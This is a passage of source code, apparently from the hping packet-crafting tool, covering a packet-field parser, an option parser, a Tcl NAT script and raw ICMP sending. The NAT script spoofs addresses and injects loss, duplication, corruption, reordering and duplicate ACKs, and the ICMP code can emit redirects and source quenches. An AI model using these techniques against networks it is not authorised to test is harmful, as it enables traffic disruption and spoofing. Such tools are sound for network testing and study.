IP\n" 153 | " option (be careful, no check is performed on this pointer), and defaults\n" 154 | " to 8, or 4 if provided route is too short for 8;\n" 155 | " and each IPx field is an IP address to include in the source route.\n"); 156 | } 157 | -------------------------------------------------------------------------------- /apdutils.c: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2003 Salvatore Sanfilippo 2 | * $Id: apdutils.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ 3 | */ 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | /* This function returns the indexes to seek a given field 10 | * of a given layer in an APD packet rappresentation. 11 | * The function is quite fast compared to a pure-Tcl regexp 12 | * based approach, sorry if it is quite ugly. 13 | * 14 | * field_start, value_start and value_end are set by reference, 15 | * the following graph shows where this three indexes point, 16 | * assuming the function is called with layer="ip" and field="tos": 17 | * 18 | * ip(ihl=5,ver=4,tos=0x10,...)+udp(...) 19 | * ^ ^ ^ 20 | * | | |____ field_start 21 | * | |_______ value_start 22 | * |___________ value_end 23 | * 24 | * The function returns 0 if layer/field don't match with 25 | * the packet, otherwise 1 is returned. If a given index pointer 26 | * is NULL, it is just not used. */ 27 | int ars_d_firstfield_off(char *packet, char *layer, char *field, 28 | int *field_start, int *value_start, int *value_end) 29 | { 30 | int layerlen = strlen(layer); 31 | int fieldlen = strlen(field); 32 | int pktlen = strlen(packet); 33 | char *x = alloca(layerlen+3); 34 | char *y = alloca(fieldlen+3); 35 | char *p, *j, *w; 36 | x[0] = '+'; 37 | memcpy(x+1, layer, layerlen); 38 | x[layerlen+1] = '('; 39 | x[layerlen+2] = '\0'; 40 | if (pktlen <= layerlen+1) 41 | return 0; 42 | if (memcmp(packet, x+1, layerlen+1) == 0) { 43 | p = packet; 44 | } else { 45 | p = strstr(packet, x); 46 | if (p == NULL) 47 | return 0; 48 | p++; 49 | } 50 | y[0] = ','; 51 | memcpy(y+1, field, fieldlen); 52 | y[fieldlen+1] = '='; 53 | y[fieldlen+2] = '\0'; 54 | p += layerlen + 1; 55 | pktlen -= p-packet; 56 | if (pktlen <= fieldlen+1) 57 | return 0; 58 | if ((j = strchr(p, ')')) == NULL) 59 | return 0; 60 | if (memcmp(p, y+1, fieldlen+1)) { 61 | p = strstr(p, y); 62 | if (p == NULL || p >= j) 63 | return 0; 64 | p++; 65 | } 66 | if (field_start) *field_start = p-packet; 67 | p += fieldlen + 1; 68 | if (value_start) *value_start = p-packet; 69 | w = strchr(p, ','); 70 | if (w && w < j) 71 | j = w; 72 | if (value_end) *value_end = (j-packet)-1; 73 | return 1; 74 | } 75 | 76 | /* This function extends ars_d_firstfield_off(), allowing to specify 77 | * how much layers of the same type of 'layer' to skip. This is 78 | * useful to get fields in packets where the same layer is present 79 | * more then one time. For example ICMP error packets contains 80 | * a quoted IP packet that can be accessed using a skip value of 1 81 | * (to skip the first IP layer). */ 82 | int ars_d_field_off(char *packet, char *layer, char *field, int skip, 83 | int *field_start, int *value_start, int *value_end) 84 | { 85 | char *p = packet; 86 | int end, toadd; 87 | 88 | /* Minimal overhead with a zero skip */ 89 | if (skip <= 0) 90 | return ars_d_firstfield_off(packet, layer, field, 91 | field_start, value_start, value_end); 92 | do { 93 | if (!ars_d_firstfield_off(p, layer, field, 94 | field_start, value_start, &end)) 95 | return 0; 96 | toadd = p-packet; 97 | p += end; 98 | } while(skip--); 99 | if (value_end) *value_end = end + toadd; 100 | if (field_start) *field_start += toadd; 101 | if (value_start) *value_start += toadd; 102 | return 1; 103 | } 104 | 105 | /* The function calls ars_d_field_off() in order to 106 | * return a dynamically allocated string containing 107 | * the value of the given field. On error (no match or out of mem) 108 | * NULL is returned. */ 109 | char *ars_d_field_get(char *packet, char *layer, char *field, int skip) 110 | { 111 | int start, end, len; 112 | char *x; 113 | 114 | if (!ars_d_field_off(packet, layer, field, skip, NULL, &start, &end)) 115 | return NULL; 116 | len = end-start+1; 117 | if ((x = malloc(len+1)) == NULL) 118 | return NULL; 119 | memcpy(x, packet+start, len); 120 | x[len] = '\0'; 121 | return x; 122 | } 123 | 124 | #ifdef TESTMAIN 125 | char packet[] = "ip(ihl=5,ver=4,tos=00,totlen=1340,id=43581,fragoff=0,mf=0,df=1,rf=0,ttl=4,proto=6,cksum=9029,saddr=192.168.1.6,daddr=195.14.221.49)+tcp(sport=55617,dport=80,seq=4048054653,ack=1246471424,x2=0,off=5,flags=pa,win=8576,cksum=6082,urp=0)+data(hex=0cd68e94650059b4dc81b1562d7288254c3faf5d651b75d1393abc6dcd5f5d1ad2f56b9bca9edc84b9212890b9407232b0d0e10222b4391e2e915c8ba4c0cb89c540d4c1389503c2d48b2c60a6c73500603cdba72144eccbd8f4cfc020af7d540fe99ea8fd0975371fb8f8167a0a1b94cf53e208cdce36dc2b692a857b958822ddac8d2cd1e8d9966a0361f345988084d558d8679f1393de4781ac8499178059f9f01d940cb2a8dfc288e500637c6a424ebde14068523291dc92bcec2e5eb4c8c53ad4192ff1e41e9e9e7cd5e389ef9dd3b9062d8509ac2f88a41863f009dfb3b08c041a68369561fa2bd9ffc09289d8719c2d52d6a687f3b837bbc51eb2a3aac50fafd2abf1a8374ca8cf6ab76a8a562e7e0995b43508a8a39abc6760738e4ef532b8968ef460719c2070eaa38fb67325e4f0903fe407b203a2d3d1bfb78dc0c430fbfc20029b0a2445801f9478beee2d964d95241edfa6322f34515b39ebbf2de43a3c533ba870ea8ef78b3baa70fb1d3491dcf931459395e92497205b633af5f426a921b79a28c5e1b86558f7b7e608c3cb0afa15dc8c60ad1897944074c712e141ae9ed44f3431c9e51ab6f92ab8248cc24279db669f6da1fecdf9ea299b24d94e7847545eab663e77e3a23fe133a8c7d18d23efbfa0a236586c315455ecae03c1d2e23bf713e9a240b26b83c5e5ead196581805ac6132f1454fb4c91a16d9cada46b1be728d697167d9b3c29cdcea3b04346116457bba715203bd45a3540d57a71368e9a015ae8d36368176752fdd93e975fd18e2797f53408aba273a20bad8f7f7763c20954e4aa371e0bbd4c03a9963a175fdd06457b3e39732e65d9443959adc1555e4bd59dcb7855bf204e31f04ad8ffb956e04a10896fdf861bd42408e10f47d38cffb3c9719bcff739265e3591bf5a2beedd9c90dc8a72c2dee5dc896914dee4c48f43c977736e4112255e4cd10d7812693b99f4484aa70d632f7ae94ce0bda674df8775fd017e40baae817de058b4563cba5539c5d4d580a754a3a042e49a6e56c7ce889388a606fde17ee8e25fa1c30abdd924564a3c03e5d2b7f265f4d030060b5d24da79c32a518c3febc3d8c2386298bfebbaee444be0252ac5ec5c93a212d4ebc0dd8e227629eb28161bb9037e6df3c02191a4a7b7c0c4187c99b99801399dbf325fcff261a97638c39656f32d292c3527004f7c00d1b51131d5d997a6a9934885ca44b4d856bddcb12b80f9484b3a5885e0c79e63ec1374efece0f7140df35c949dcaa49af4165d754dd1ff6d7747864ebfe1aac0d3979923e2cffc0ea2da693b10c2c794957161f382811d0196d69ab9b3b8c5edc8338f17632470f50ec34ceaecf4c6e30e6131db340a51f7113b614993f22b582bb47f8caffd8bca5aff325443a55fe16f2f57d8cdf86cd131062672b48122bdaabd844abf20ccfd8d82069c2120e706a4894709758fcd35c6e57a6fb64d6c03d14ef4ac5ba6347cc92b6d899cd6cdbf9e8be573eff7550dbb453cb5ac1fa9900ce73cd57cdc3b95aaad0d293a9c7e4a5054f8a46c9052d44f0d4b3fc5f6670a9c318f44d429f35ca4c1ce1b6d39daf02fa05c8decc46889a6fcf0f4491e563cbde158dc046f52cd328ac40c9c26629f6f42de60f9c7d52fe131a16b04a37c4967794ee4aa76c28463e8ca393abd6ca7aa41a9155db94a7d14f7a5f6ebaa2ee6751f0b139b403d524f433c939c382001fc1c6e9be709b55fcf01b01996889529917fabae23310a54878ca94601cf3182e9a5b01eabb588ff953c91205c56b54a2e125aa9c1c9753e5515566d027a827e55e1a6863cc82)+ip(ihl=5,ver=4,tos=10,totlen=1340,id=43581,fragoff=0,mf=0,df=1,rf=0,ttl=4,proto=6,cksum=9029,saddr=192.168.1.6,daddr=195.14.221.49)+tcp(sport=55617,dport=80,seq=4048054653,ack=1246471424,x2=0,off=5,flags=pa,win=8576,cksum=6082,urp=0)+ip(ihl=5,ver=4,tos=20,totlen=1340,id=43581,fragoff=0,mf=0,df=1,rf=0,ttl=4,proto=6,cksum=9029,saddr=192.168.1.6,daddr=195.14.221.49)"; 126 | 127 | int main(int argc, char **argv) 128 | { 129 | int i = 10000; 130 | int field_start, value_start, value_end; 131 | int skip; 132 | 133 | if (argc != 4) 134 | exit(1); 135 | skip = atoi(argv[3]); 136 | if (ars_d_field_off(packet, argv[1], argv[2], skip, 137 | &field_start, &value_start, &value_end)) 138 | { 139 | int j; 140 | printf("|"); 141 | for (j = field_start; j <= value_end; j++) { 142 | printf("%c", packet[j]); 143 | } 144 | printf("|\n"); 145 | } 146 | while(i--) { 147 | ars_d_field_off(packet, argv[1], argv[2], skip, 148 | NULL, NULL, NULL); 149 | } 150 | return 0; 151 | } 152 | #endif 153 | -------------------------------------------------------------------------------- /antigetopt.c: -------------------------------------------------------------------------------- 1 | /* antigetopt -- a getopt replacement 2 | * Copyright(C) 2001 Salvatore Sanfilippo 3 | * This software is released under the GPL license 4 | * see the COPYING file for more information */ 5 | 6 | /* $Id: antigetopt.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 7 | 8 | /* TODO: 9 | * argument list sanity check */ 10 | 11 | #include 12 | #include 13 | #include 14 | 15 | #include "antigetopt.h" 16 | 17 | /* global vars */ 18 | char *ago_optarg = NULL; 19 | char *ago_optname = NULL; 20 | char ago_optchar = '\0'; 21 | 22 | /* static vars */ 23 | static struct ago_exception { 24 | int (*tester)(void); 25 | char *msg; 26 | } ago_exceptions[3] = { 27 | { NULL, NULL }, 28 | { NULL, NULL }, 29 | { NULL, NULL } 30 | }; 31 | 32 | static int ago_exception_bits[] = { AGO_EXCEPT0, AGO_EXCEPT1, AGO_EXCEPT2 }; 33 | 34 | /* static functions */ 35 | static struct ago_optlist 36 | *ago_lookup(struct ago_optlist *list, char *arg, int *islong, int *amb); 37 | static int strinitcmp(char *a, char *b); 38 | 39 | /*----------------------------- implementation ------------------------------ */ 40 | 41 | int antigetopt(int argc, char **argv, struct ago_optlist *list) 42 | { 43 | static char **save_argv = NULL; 44 | static char *chain = NULL; 45 | static int endoptions = 0; 46 | struct ago_optlist *opt; 47 | int islong; 48 | 49 | /* Reset */ 50 | if (argv == NULL) { 51 | save_argv = NULL; 52 | chain = NULL; 53 | endoptions = 0; 54 | return AGO_RESET; 55 | } else { 56 | if (save_argv == NULL) { 57 | save_argv = argv+1; /* skips the argv[0] */ 58 | /* XXX: argument list sanity check */ 59 | } 60 | } 61 | 62 | chain_start: 63 | if (chain) { 64 | if (*chain == '\0') 65 | chain = NULL; 66 | else { 67 | if ((opt = ago_lookup(list, chain, &islong, NULL)) 68 | == NULL) 69 | return AGO_UNKNOWN; 70 | if (!(opt->ao_flags & AGO_NOARG)) { 71 | /* the if expression maybe false if the 72 | * argument is optional */ 73 | if (chain[1] == '\0' && *save_argv) 74 | ago_optarg = *save_argv++; 75 | /* while it is mandatory for the NEEDARG type */ 76 | else if (opt->ao_flags & AGO_NEEDARG) 77 | return AGO_REQARG; 78 | } 79 | chain++; 80 | return opt->ao_id; 81 | } 82 | } 83 | 84 | argv = save_argv; 85 | 86 | /* handle the "--" special option */ 87 | if (*argv && strcmp(*argv, "--") == 0) { 88 | endoptions = 1; 89 | argv++; 90 | save_argv++; 91 | } 92 | 93 | while(*argv) { 94 | /* The option must start with '-' */ 95 | if (!endoptions && argv[0][0] == '-' && argv[0][1] != '\0') { 96 | int amb; 97 | 98 | /* note: ago_lookup also sets ago_optname */ 99 | if ((opt = ago_lookup(list, argv[0], &islong, &amb)) 100 | == NULL) 101 | return amb ? AGO_AMBIG : AGO_UNKNOWN; 102 | 103 | /* handle the collapsed short options */ 104 | if (!islong && argv[0][2] != '\0') { 105 | chain = argv[0]+1; 106 | save_argv++; 107 | goto chain_start; 108 | } 109 | 110 | /* if the option require or may have an argument */ 111 | ago_optarg = NULL; 112 | /* If the argument is needed we get the next argv[] 113 | * element without care about what it contains */ 114 | if (opt->ao_flags & AGO_NEEDARG) { 115 | if (argv[1] == NULL) 116 | return AGO_REQARG; 117 | ago_optarg = argv[1]; 118 | argv++; 119 | } 120 | /* If the argument is optional we only recognize it 121 | * as argument if it does not starts with '-' */ 122 | else if (opt->ao_flags & AGO_OPTARG) { 123 | if (argv[1] && argv[1][0] != '-') { 124 | ago_optarg = argv[1]; 125 | argv++; 126 | } 127 | } 128 | save_argv = argv+1; 129 | return opt->ao_id; 130 | } else { 131 | save_argv = argv+1; 132 | ago_optarg = argv[0]; 133 | ago_optchar = '\0'; 134 | ago_optname = NULL; 135 | return AGO_ALONE; 136 | } 137 | } 138 | return AGO_EOF; 139 | } 140 | 141 | #define UNK_SHORT_ERRSTRING "invalid option -- %c\n" 142 | #define UNK_LONG_ERRSTRING "unrecognized option `--%s'\n" 143 | #define ARG_SHORT_ERRSTRING "option requires an argument -- %c\n" 144 | #define ARG_LONG_ERRSTRING "option `--%s' requires an argument\n" 145 | #define AMB_ERRSTRING "option `--%s' is ambiguos\n" 146 | #define IERR_ERRSTRING "internal error. ago_gnu_error() called with " \ 147 | "a bad error code (%d)\n" 148 | void ago_gnu_error(char *pname, int error) 149 | { 150 | if (pname) 151 | fprintf(stderr, "%s: ", pname); 152 | switch(error) { 153 | case AGO_UNKNOWN: 154 | if (ago_optname) 155 | fprintf(stderr, UNK_LONG_ERRSTRING, 156 | ago_optname); 157 | else 158 | fprintf(stderr, UNK_SHORT_ERRSTRING, 159 | ago_optchar); 160 | break; 161 | case AGO_REQARG: 162 | if (ago_optname) 163 | fprintf(stderr, ARG_LONG_ERRSTRING, 164 | ago_optname); 165 | else 166 | fprintf(stderr, ARG_SHORT_ERRSTRING, 167 | ago_optchar); 168 | break; 169 | case AGO_AMBIG: 170 | fprintf(stderr, AMB_ERRSTRING, ago_optname); 171 | break; 172 | default: 173 | fprintf(stderr, IERR_ERRSTRING, error); 174 | break; 175 | } 176 | } 177 | 178 | int ago_set_exception(int except_nr, int (*tester)(void), char *msg) 179 | { 180 | if (tester == NULL || msg == NULL || except_nr < 0 || except_nr >= 3) 181 | return -1; 182 | ago_exceptions[except_nr].tester = tester; 183 | ago_exceptions[except_nr].msg = msg; 184 | return 0; 185 | } 186 | 187 | /*-------------------------- static functions ------------------------------- */ 188 | 189 | struct ago_optlist 190 | *ago_lookup(struct ago_optlist *list, char *arg, int *islong, int *amb) 191 | { 192 | int i; 193 | 194 | /* ago_lookup can be receive as `arg' a pointer to a 195 | * long argument, like --option, a pointer to a short 196 | * argument like -O, or just a pointer to a char sequence 197 | * in the case of collapsed short arguments like -abcde. */ 198 | 199 | /* Clear the 'ambiguos' flag, used to report the caller 200 | * an ambiguos option abbreviation error */ 201 | if (amb) *amb = 0; 202 | 203 | if (*arg == '-') /* skips the first - if any */ 204 | arg++; 205 | 206 | switch(*arg) { 207 | case '\0': 208 | return NULL; 209 | case '-': 210 | *islong = 1; 211 | arg++; /* skip the last - */ 212 | break; 213 | default: 214 | *islong = 0; 215 | break; 216 | } 217 | 218 | /* search the argument in the list */ 219 | if (*islong) { 220 | int retval; 221 | struct ago_optlist *last = NULL; 222 | 223 | while(!(list->ao_flags & AGO_ENDOFLIST)) { 224 | ago_optname = arg; 225 | ago_optchar = '\0'; 226 | if ((retval = strinitcmp(arg, list->ao_long)) != 0) { 227 | switch(retval) { 228 | case 1: 229 | if (last) { 230 | if (amb) *amb = 1; 231 | return NULL; 232 | } 233 | last = list; 234 | break; 235 | case 2: 236 | goto ok; 237 | } 238 | } 239 | list++; 240 | } 241 | if (last) { 242 | ago_optname = last->ao_long; 243 | list = last; 244 | goto ok; 245 | } 246 | } else { 247 | ago_optchar = *arg; 248 | ago_optname = NULL; 249 | while(!(list->ao_flags & AGO_ENDOFLIST)) { 250 | if (*arg == list->ao_short) 251 | goto ok; 252 | list++; 253 | } 254 | } 255 | return NULL; 256 | ok: 257 | /* handle the exceptions if any */ 258 | for (i = 0; i < 3; i++) { 259 | if ((list->ao_flags & ago_exception_bits[i]) && 260 | ago_exceptions[i].tester) 261 | { 262 | if (ago_exceptions[i].tester()) { 263 | if (ago_optname) { 264 | fprintf(stderr, "%s `--%s'\n", 265 | ago_exceptions[i].msg, 266 | ago_optname); 267 | } else { 268 | fprintf(stderr, "%s `-%c'\n", 269 | ago_exceptions[i].msg, 270 | ago_optchar); 271 | } 272 | exit(1); 273 | } 274 | } 275 | } 276 | return list; 277 | } 278 | 279 | /* Given two strings this function returns: 280 | * 1, if the strings are the same for the len of the first string (abc, abcde) 281 | * 2, if the strings are exactly the same: (abcd, abcd) 282 | * otherwise zero is returned (abcde, abcd) ... (djf, 293492) */ 283 | int strinitcmp(char *a, char *b) 284 | { 285 | if (!a || !b) 286 | return 0; 287 | while (*a && *b) { 288 | if (*a != *b) 289 | return 0; 290 | a++; b++; 291 | } 292 | if (*a) 293 | return 0; 294 | if (*a == *b) 295 | return 2; 296 | return 1; 297 | } 298 | -------------------------------------------------------------------------------- /lib/nat-noise.htcl: -------------------------------------------------------------------------------- 1 | # 2 | # A simple NAT toy with alteration filters. 3 | # 4 | 5 | package require profiler 6 | 7 | ::profiler::init 8 | 9 | ################################### CONFIG ##################################### 10 | 11 | source "hpingstdlib.htcl" 12 | set target [hping resolve 192.168.0.3] 13 | set myip [hping outifa $target] 14 | set fakeip 192.168.10.100 15 | set outlist {} 16 | set inlist {} 17 | 18 | if {1} { 19 | set input_modules { 20 | {mod_dup .2} 21 | {mod_loss .2} 22 | {mod_print "input: "} 23 | {mod_send 100} 24 | {mod_zap} 25 | } 26 | 27 | set output_modules { 28 | {mod_dup .0} 29 | {mod_loss .0} 30 | {mod_corrupt_data 1 .1} 31 | {mod_print "output: "} 32 | {mod_send 0} 33 | {mod_zap} 34 | } 35 | } 36 | 37 | if {0} { 38 | set output_modules { 39 | {mod_shuffle 5 500 input} 40 | {mod_send 0} 41 | {mod_zap} 42 | } 43 | set input_modules { 44 | {mod_send 0} 45 | {mod_zap} 46 | } 47 | } 48 | 49 | if {0} { 50 | set output_modules { 51 | {mod_tcp_daytona_dupack 50} 52 | {mod_send 0} 53 | {mod_zap} 54 | } 55 | set input_modules { 56 | {mod_send 0} 57 | {mod_zap} 58 | } 59 | } 60 | 61 | if {0} { 62 | set output_modules { 63 | {mod_tcp_frag 1} 64 | {mod_send 0} 65 | {mod_zap} 66 | } 67 | set input_modules { 68 | {mod_send 0} 69 | {mod_zap} 70 | } 71 | } 72 | 73 | 74 | #################################### CORE ###################################### 75 | 76 | proc donat {} { 77 | global target myip fakeip outlist inlist 78 | 79 | set packets [hping recv -hexdata eth0 0 10] 80 | foreach p $packets { 81 | DelApdField ip cksum p 82 | DelApdField tcp cksum p 83 | DelApdField tcp off p 84 | #puts "[GetIpSaddr $p] -> [GetIpDaddr $p]" 85 | if {[GetIpSaddr $p] == $myip && [GetIpDaddr $p] == $fakeip} { 86 | SetApdField ip saddr $fakeip p 87 | SetApdField ip daddr $target p 88 | lappend outlist $p 89 | puts -nonewline O; flush stdout 90 | } elseif {[GetIpSaddr $p] == $target && [GetIpDaddr $p] == $fakeip} { 91 | SetApdField ip saddr $fakeip p 92 | SetApdField ip daddr $myip p 93 | lappend inlist $p 94 | puts -nonewline I; flush stdout 95 | } 96 | } 97 | after idle donat 98 | } 99 | 100 | proc runmodules {} { 101 | global outlist inlist input_modules output_modules 102 | 103 | if {[llength $inlist]} { 104 | foreach m $input_modules { 105 | lappend m $inlist 106 | set inlist [eval $m] 107 | } 108 | } 109 | if {[llength $outlist]} { 110 | foreach m $output_modules { 111 | lappend m $outlist 112 | set outlist [eval $m] 113 | } 114 | } 115 | after idle runmodules 116 | } 117 | 118 | #################################### MODULES ################################### 119 | 120 | ### DUP ### 121 | proc mod_dup {rate packets} { 122 | foreach p $packets { 123 | lappend l $p 124 | if {rand() < $rate} { 125 | puts -nonewline D; flush stdout 126 | lappend l $p 127 | } 128 | } 129 | return $l 130 | } 131 | 132 | ### LOSS ### 133 | proc mod_loss {rate packets} { 134 | set l {} 135 | foreach p $packets { 136 | if {rand() >= $rate} { 137 | lappend l $p 138 | } else { 139 | puts -nonewline L; flush stdout 140 | } 141 | } 142 | return $l 143 | } 144 | 145 | ### SEND ### 146 | proc mod_send {maxdelay packets} { 147 | set len [llength $packets] 148 | for {set i [expr $len-1]} {$i >= 0} {incr i -1} { 149 | set p [lindex $packets $i] 150 | puts -nonewline W; flush stdout 151 | if {$maxdelay} { 152 | set ms [expr int(rand()*($maxdelay+1))] 153 | after $ms "hping send $p" 154 | } else { 155 | hping send $p 156 | } 157 | } 158 | return $packets 159 | } 160 | 161 | ### ZAP ### 162 | proc mod_zap packets { 163 | return {} 164 | } 165 | 166 | ### PRINT ### 167 | proc mod_print {tag packets} { 168 | foreach p $packets { 169 | puts "$tag $p" 170 | } 171 | return $packets 172 | } 173 | 174 | ### CORRUPT_DATA ### 175 | proc mod_corrupt_data {num rate packets} { 176 | # return $packets 177 | foreach p $packets { 178 | set mod 0 179 | set data [GetApdField data hex $p] 180 | set len [string length $data] 181 | if {$len} { 182 | for {set i 0} {$i < $num} {incr i} { 183 | if {rand() < $rate} { 184 | set byte [format "%02x" [expr int(rand()*256)]] 185 | set x [expr $len/2] 186 | set offset [expr int(rand()*$x)] 187 | set data [string replace $data [expr $offset*2] [expr ($offset*2)+1] $byte] 188 | } 189 | } 190 | SetApdField data hex $data p 191 | } 192 | lappend l $p 193 | } 194 | return $l 195 | } 196 | 197 | ### SHUFFLE AND HELPER FUNCTIONS ### 198 | proc K { x y } { set x } 199 | 200 | proc shuffle { list } { 201 | set n [llength $list] 202 | while {$n > 0} { 203 | set j [expr {int(rand()*$n)}] 204 | lappend slist [lindex $list $j] 205 | incr n -1 206 | set temp [lindex $list $n] 207 | set list [lreplace [K $list [set list {}]] $j $j $temp] 208 | } 209 | return $slist 210 | } 211 | 212 | proc shuffle_flush {tag packets} { 213 | global shuffle_list_$tag shuffle_startms_$tag pending_flush_$tag 214 | 215 | unset shuffle_list_$tag 216 | unset shuffle_startms_$tag 217 | set pending_flush_$tag 0 218 | mod_send 0 $packets 219 | } 220 | 221 | proc mod_shuffle {count timeout tag packets} { 222 | global shuffle_list_$tag shuffle_startms_$tag pending_flush_$tag 223 | global pending_flush_id_$tag 224 | 225 | if {! [info exists shuffle_list_$tag]} { 226 | set shuffle_list_$tag {} 227 | set shuffle_startms_$tag [clock clicks -milliseconds] 228 | set pending_flush_$tag 0 229 | } 230 | if {[info exists pending_flush_$tag] && [set pending_flush_$tag]} { 231 | after cancel [set pending_flush_id_$tag] 232 | set pending_flush_$tag 0 233 | } 234 | set shuffle_list_$tag [concat [set shuffle_list_$tag] $packets] 235 | set len [llength [set shuffle_list_$tag]] 236 | if {$len >= $count} { 237 | set x [shuffle [set shuffle_list_$tag]] 238 | unset shuffle_list_$tag 239 | unset shuffle_startms_$tag 240 | return $x 241 | } elseif {$len} { 242 | set elapsed [expr [clock clicks -milliseconds] - [set shuffle_startms_$tag]] 243 | set flush_delay [expr $timeout - $elapsed] 244 | if {$flush_delay <= 0} {set flush_delay 1} 245 | set pending_flush_id_$tag [after $flush_delay [list shuffle_flush $tag [set shuffle_list_$tag]]] 246 | set pending_flush_$tag 1 247 | return {} 248 | } 249 | return {} 250 | } 251 | 252 | ### DUP ACK ### 253 | proc mod_tcp_daytona_dupack {count packets} { 254 | foreach p $packets { 255 | if {[string match [hping getfield tcp flags $p] "a"] && [string length [hping getfield data hex $p]] == 0} { 256 | puts -nonewline .DUPACK.; flush stdout 257 | for {set i 0} {$i < $count} {incr i} { 258 | lappend l $p 259 | } 260 | } else { 261 | lappend l $p 262 | } 263 | } 264 | return $l 265 | } 266 | 267 | ### TCP FRAG ### 268 | proc mod_tcp_frag {size packets} { 269 | foreach p $packets { 270 | if {[GetIpProto $p] != 6} { 271 | lappend temp $p 272 | continue 273 | } 274 | set data [GetDataHex $p] 275 | if {[llength $data] == 0} { 276 | lappend temp $p 277 | continue 278 | } 279 | set datalen [string length $data] 280 | if {$datalen <= $size} { 281 | lappend temp $p 282 | continue 283 | } 284 | set seq [GetTcpSeq $p] 285 | set size [expr {$size*2}] 286 | set xtemp {} 287 | while {$datalen} { 288 | set l [if {$datalen >= $size} {set size} {set datalen}] 289 | set load [string range $data 0 [expr {$l-1}]] 290 | set data [string range $data $l end] 291 | incr datalen -$l 292 | set p [hping setfield tcp seq $seq $p] 293 | set p [hping setfield data hex $load $p] 294 | set p [hping delfield ip totlen $p] 295 | set p [hping delfield ip cksum $p] 296 | set p [hping delfield tcp cksum $p] 297 | set p [hping delfield tcp off $p] 298 | puts "$seq $load" 299 | lappend xtemp $p 300 | incr seq [expr {$l/2}] 301 | } 302 | set xtl [expr {[llength $xtemp]-1}] 303 | for {set j $xtl} {$j >= 0} {incr j -1} { 304 | lappend temp [lindex $xtemp $j] 305 | } 306 | } 307 | return $temp 308 | } 309 | 310 | # vim: filetype=tcl 311 | 312 | ### PROFILER HELPER ### 313 | proc prof {} { 314 | puts [::profiler::print] 315 | puts [::profiler::sortFunctions exclusiveRuntime] 316 | after 1000 prof 317 | } 318 | 319 | ################################# EVENT LOOP ################################### 320 | 321 | after 1 donat 322 | after 1 runmodules 323 | #after 1 prof 324 | vwait forever 325 | 326 | # vim: filetype=tcl 327 | -------------------------------------------------------------------------------- /sendicmp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: sendicmp.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:49 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: sendicmp.c,v 1.1.1.1 2003/08/31 17:23:53 antirez Exp $ */ 12 | 13 | #include /* this should be not needed, but ip_icmp.h lacks it */ 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | 23 | #include "hping2.h" 24 | #include "globals.h" 25 | 26 | static int _icmp_seq = 0; 27 | 28 | void send_icmp_echo(void); 29 | void send_icmp_other(void); 30 | void send_icmp_timestamp(void); 31 | void send_icmp_address(void); 32 | 33 | void send_icmp(void) 34 | { 35 | switch(opt_icmptype) 36 | { 37 | case ICMP_ECHO: /* type 8 */ 38 | case ICMP_ECHOREPLY: /* type 0 */ 39 | send_icmp_echo(); 40 | break; 41 | case ICMP_DEST_UNREACH: /* type 3 */ 42 | case ICMP_SOURCE_QUENCH: /* type 4 */ 43 | case ICMP_REDIRECT: /* type 5 */ 44 | case ICMP_TIME_EXCEEDED: /* type 11 */ 45 | send_icmp_other(); 46 | break; 47 | case ICMP_TIMESTAMP: 48 | case ICMP_TIMESTAMPREPLY: 49 | send_icmp_timestamp(); 50 | break; 51 | case ICMP_ADDRESS: 52 | case ICMP_ADDRESSREPLY: 53 | send_icmp_address(); 54 | break; 55 | default: 56 | if (opt_force_icmp) { 57 | send_icmp_other(); 58 | break; 59 | } else { 60 | printf("[send_icmp] Unsupported icmp type!\n"); 61 | exit(1); 62 | } 63 | } 64 | } 65 | 66 | void send_icmp_echo(void) 67 | { 68 | char *packet, *data; 69 | struct myicmphdr *icmp; 70 | 71 | packet = malloc(ICMPHDR_SIZE + data_size); 72 | if (packet == NULL) { 73 | perror("[send_icmp] malloc"); 74 | return; 75 | } 76 | 77 | memset(packet, 0, ICMPHDR_SIZE + data_size); 78 | 79 | icmp = (struct myicmphdr*) packet; 80 | data = packet + ICMPHDR_SIZE; 81 | 82 | /* fill icmp hdr */ 83 | icmp->type = opt_icmptype; /* echo replay or echo request */ 84 | icmp->code = opt_icmpcode; /* should be indifferent */ 85 | icmp->checksum = 0; 86 | icmp->un.echo.id = getpid() & 0xffff; 87 | icmp->un.echo.sequence = _icmp_seq; 88 | 89 | /* data */ 90 | data_handler(data, data_size); 91 | 92 | /* icmp checksum */ 93 | if (icmp_cksum == -1) 94 | icmp->checksum = cksum((u_short*)packet, ICMPHDR_SIZE + data_size); 95 | else 96 | icmp->checksum = icmp_cksum; 97 | 98 | /* adds this pkt in delaytable */ 99 | if (opt_icmptype == ICMP_ECHO) 100 | delaytable_add(_icmp_seq, 0, time(NULL), get_usec(), S_SENT); 101 | 102 | /* send packet */ 103 | send_ip_handler(packet, ICMPHDR_SIZE + data_size); 104 | free (packet); 105 | 106 | _icmp_seq++; 107 | } 108 | 109 | void send_icmp_timestamp(void) 110 | { 111 | char *packet; 112 | struct myicmphdr *icmp; 113 | struct icmp_tstamp_data *tstamp_data; 114 | 115 | packet = malloc(ICMPHDR_SIZE + sizeof(struct icmp_tstamp_data)); 116 | if (packet == NULL) { 117 | perror("[send_icmp] malloc"); 118 | return; 119 | } 120 | 121 | memset(packet, 0, ICMPHDR_SIZE + sizeof(struct icmp_tstamp_data)); 122 | 123 | icmp = (struct myicmphdr*) packet; 124 | tstamp_data = (struct icmp_tstamp_data*) (packet + ICMPHDR_SIZE); 125 | 126 | /* fill icmp hdr */ 127 | icmp->type = opt_icmptype; /* echo replay or echo request */ 128 | icmp->code = 0; 129 | icmp->checksum = 0; 130 | icmp->un.echo.id = getpid() & 0xffff; 131 | icmp->un.echo.sequence = _icmp_seq; 132 | tstamp_data->orig = htonl(get_midnight_ut_ms()); 133 | tstamp_data->recv = tstamp_data->tran = 0; 134 | 135 | /* icmp checksum */ 136 | if (icmp_cksum == -1) 137 | icmp->checksum = cksum((u_short*)packet, ICMPHDR_SIZE + 138 | sizeof(struct icmp_tstamp_data)); 139 | else 140 | icmp->checksum = icmp_cksum; 141 | 142 | /* adds this 